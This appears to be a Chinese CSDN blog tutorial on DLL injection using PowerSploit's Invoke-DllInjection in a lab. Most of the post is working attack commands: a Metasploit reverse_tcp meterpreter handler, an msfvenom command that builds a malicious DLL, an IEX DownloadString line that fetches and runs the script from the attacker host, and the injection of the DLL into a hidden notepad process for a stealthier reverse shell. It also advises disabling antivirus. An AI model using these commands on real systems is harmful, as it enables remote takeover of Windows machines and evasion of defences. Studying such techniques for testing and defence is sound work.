使用powersploit的Invoke-DLLInjection进行DLL注入

最新推荐文章于 2023-03-03 03:06:00 发布
最新推荐文章于 2023-03-03 03:06:00 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 网络安全 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013930899/article/details/124646357
版权

DLL注入 PowerShell Metasploit 渗透测试 Kali Linux
关键词由CSDN通过智能技术生成

1. Invoke-DLLInjection简介

        使用Code Execution模块的Invoke-DLLInjection,是一个DLL注入的脚本。

2. 实验环境

        Kali: 192.168.101.46

        目标机器:192.168.101.124

3. 配置msf

        msfconsole

        use exploit/multi/handler

        set payload windows/x64/meterpreter/reverse_tcp

        set LHOST 192.168.101.46

        run

4. 在kali上生成dll脚本

        新打开一个会话窗,输入

        msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.101.46 lport=4444 -f dll    -o /var/www/html/test.dll

5. 在目标机器下载Invoke-DllInjection.psl脚本

        IEX (New-Object Net.WebClient).DownloadString("http://192.168.101.46/PowerSploit/CodeExecution/Invoke-DllInjection.ps1")

6. 把生成的test.dll上传到目标服务器的C盘

        把生成的test.dll上传到目标服务器的C盘后,就能启动一个新的进程进行DLL注入,这样可以使注入更加隐蔽。

7. 使用以下命令新建一个名为notepad.exe的隐藏进程

        Start-Process c:\windows\system32\notepad.exe -WindowStyle Hidden

8. 获取notepad的进程号

        Get-Process -Name notepad

9. 使用以下命令进行注入

        Invoke-DllInjection -ProcessID 216 -Dll c:\test.dll

10. 返回MSF监听界面,发现已经反弹成功

11. 注意点

        杀毒软件报毒,实验环境可退出杀毒软件!!!

見贤思齊
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【EXP】利用powersploit实现进程注入
KANITAN___的博客
10-10 582
实验内容 实验名称 利用powersploit实现进程注入 实验环境 靶机:windows7,主机名target 攻击机: 宿主机:macOS,主机名host 虚拟机:kali,主机名vmhost 使用工具: metasploit:制作木马 apache2:提供下载 powersploit:进程注入工具 Parallels Desktop:虚拟机 解决问题 (1) 将...
PowerSploitInvoke-DllInjection
weixin_46104215的博客
11-08 358
DLL(Dynamic Link Library 可由多个程序同时使用的代码和数据的库):库文件,提供给使用者一些开箱即用的变量、函数或类。库文件分为静态库和动态库,静态库和动态库的区别体现在程序的链接阶段:静态库在程序的链接阶段被复制到了程序中;动态库在链接阶段没有被复制到程序中,而是程序在运行时由系统动态加载到内存中供程序调用。使用动态库系统只需载入一次,不同的程序可以得到内存中相同的动态库的副本,因此节省了很多内存,而且使用动态库也便于模块化更新程序。 静态链接库与动态链接库都是共享代码的方式,如果
python-dll-injection, 在 Windows 上,用于将DLL文件注入运行进程的python 工具包.zip
09-18
python-dll-injection, 在 Windows 上,用于将DLL文件注入运行进程的python 工具包 python-dll-injectionpython 工具箱,用于在 Windows 上的运行进程中插入DLL文件这个工具包一直在扩大,因为我bother为它增加额外的部分。 在阅读灰色帽子 python 之后,我们会感觉到这一点,以
DllInjection_CreateRemoteThread
04-30
DllInjection_CreateRemoteThread 参考ReverseCore 在Windows 7 32bit上成功运行 用法: injection.exe进程名称
DLL注入工具x86
12-31
本文首发在吾爱破解:http://www.52pojie.cn/thread-429548-1-1.html DLL注入工具有很多,但是也有很多无法注入系统进程如explorer.exe,notepad.exe等,特别是Win7以上平台。此注入工具核心注入部分使用NtCreateThreadEx + LdrLoadDlll方式实现,特色在于比一般的远程线程注入稳定,可以注入系统进程,服务进程等。使用时请保存好手头工作,以免蓝屏(我调试时蓝过很多次)。 更多详情请参考:http://blog.csdn.net/sunflover454/article/details/50441014
invoke-atomicredteam:Invoke-AtomicRedTeam是一个PowerShell模块,用于执行[atomics文件夹](https
04-30
Invoke-AtomicRedTeam是一个PowerShell模块,用于执行Red Canary的Atomic Red Team项目的中定义的测试。 “ atomics文件夹”包含定义的每种技术的文件夹。 在每个“ T#”文件夹中,您都会找到一个yaml文件,该文件...
Invoke-WCMDump结合powershell进行密码获取
03-26
Ivoke-WCMDump 什么是Credential Manager Credential Manager,中文翻译为凭据管理器,用来存储凭据(例如网站登录和主机远程连接的用户名密码),如果用户选择存储凭据,那么当用户再次使用对应的操作...Invoke-WCMDump
Invoke-WCMDump-master1.rar
06-10
使用 Invoke-WCMDump 加powershell 获取windows凭证密码 使用文档地址:https://blog.csdn.net/caperxi/article/details/117775522
PowerShell中使用curl(Invoke-WebRequest)的方法教程
01-10
前言 PowerShell能干什么呢?PowerShell首先是个Shell,定义好了一堆命令与操作系统,特别是与文件系统交互,能够启动应用程序,甚至操纵应用程序;第二,PowerShell允许将几个命令组合起来放到文件里执行,实现文件...
PowerSploitPowerSploit-PowerShell开发后框架
02-18
Invoke-DllInjectionDll注入到您选择的进程ID中。Invoke-ReflectivePEInjection 将Windows PE文件(DLL / EXE)反射性地加载到powershell进程中,或反射性地将DLL注入到远程进程中。Invoke-Shellcode 将shellcode...
dll注入工具_MITRE ATT&CK系列文章之Powershell DLL注入及日志分析
weixin_39953578的博客
11-21 432
Powershell DLL 注入模拟 1.环境准备windows服务器(靶机)webshell木马放在公网的Powershell脚本(PowerSploit)kali(攻击机)2.流程利用Powershell使用已有工具PowerSploit中的Invoke-DllInjection进行DLL注入利用,通过Invoke-Expression(IEX)调用.Net Web Client下载功能下载...
PowerShell攻击指南
鸡蛋炒鸡蛋
03-03 4191
什么是powershell?可以简单理解为cmd.exe的扩展。powershell具有灵活性和功能化管理windows系统的能力,powershell脚本文件后缀名是.ps1(数字1)Windows PowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的windows版本中,使命令行用户和脚本编写者可以利用.NET Framework的强大功能。
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹
Liu_Bruce的博客
05-09 3737
Kali渗透测试:远程控制被控端免杀及DLL生成、注入反弹 ​ 长期以来,杀毒软件厂商和黑客一直处于博弈的状态,杀毒软件厂商研究了各种检测和清除远程控制被控端的方法,而黑客也在一直致力于研究避开检测的方法(简称为免杀技术)。远程控制被控端也可被看作病毒的一种。 ​ 到目前为止,杀毒软件主要使用了3种技术。如下: 基于文件扫描的反病毒技术。这种技术主要依靠对程序的二进制代码进行检测,反病毒工程师将病毒样本中的一段特有的二进制代码串提取出来作为特征码,并将其加入病毒库,检测程序时看它是否包含这个特征码。 基于
Windows提权实战————4、DLL注入
Fly_鹏程万里
05-23 3328
前言DLL注入是一种允许攻击者在另一个进程的地址空间的上下文中运行任意代码的技术。如果某进程以过多的权限运行,那么可以会被攻击者加以利用,以DLL文件的形式执行恶意代码以提升权限。手动注入通过Metasploit的msfvenom创建DLL,该文件可以生成包含特定有效内容的DLL文件。应该注意的是,如果DLL注入的进程是64位,那么应该使用64位有效负载。下一步是设置metasploit监听,以...
PowerSploit攻击
weixin_45007073的博客
05-07 426
PowerSploit简介各模块功能Invoke-Shellcode 简介 PowerSploit是一款后渗透框架,主要用于信息侦察、权限提升、权限维持。它在github上可以下载 各模块功能 模块 功能 AntivirusBypass 发现杀毒软件的查杀特征 CodeExecution 在目标主机上执行代码 Exfiltration 目标主机上的信息搜集工具 Mayhem 蓝屏等破坏性脚本 Persistence 后门脚本 Recon 以目标主机为跳板进行内网信息侦察
系统安全攻防战:DLL注入技术详解
weixin_34258782的博客
08-15 148
DLL注入是一种允许攻击者在另一个进程的地址空间的上下文中运行任意代码的技术。攻击者使用DLL注入的过程中如果被赋予过多的运行特权,那么攻击者就很有可能会在DLL文件中嵌入自己的恶意攻击代码以获取更高的执行权限。 具体而言,该技术遵循以下步骤: 1. 需要将DLL写入磁盘中; 2. “CreateRemoteThread”调用“LoadLibrary”; 3. 反射加载程序功能将尝试使用适当的...
进行DLL注入的三种方法
陶冶的专栏
09-14 4262
进行DLL注入的三种方法 作者:陶冶(无邪) MAIL:taoy5178@hotmail.comOICQ:24149877   在WINDOWS中,每个进程都有自己独立的地址空间,这样一个应用程序就无法进入另一个进程的地址空间而不会破坏另一个进程的运行,这样使得系统更加的稳定。但这样一来,相反的,如果我们要对我们感兴趣的进程进行操作也就变得复杂起来。比如,我们要为另一个进程创建的窗口建立子类或是要
【kali】Mestasploit——基本使用2、Exploit模块、playload、metepreter
(∪.∪ )...zzz的博客
10-27 1217
这里写自定义目录标题Exploit模块1. Active exploitpsexec2. Passive Exploits Exploit模块 1. Active exploit 攻击者主动连接受害者 payload发给受害者执行 psexec use exploit/windows/smb/psexec # 基于smb协议 # 需要目标机的权限 # 利用psexec模块 # 在132上执行该模块的payload后将shell反弹给161kali的4444端口 set RHOST 192.168.98
invoke-custom 指令是什么
最新发布
06-12
invoke-custom 是 Java 虚拟机中一种比较特殊的指令,它是用于实现动态语言和函数式编程语言的重要机制之一。...这也就是为什么在低于 Android O 的版本上使用 invoke-custom 指令会导致错误的原因。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

見贤思齊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值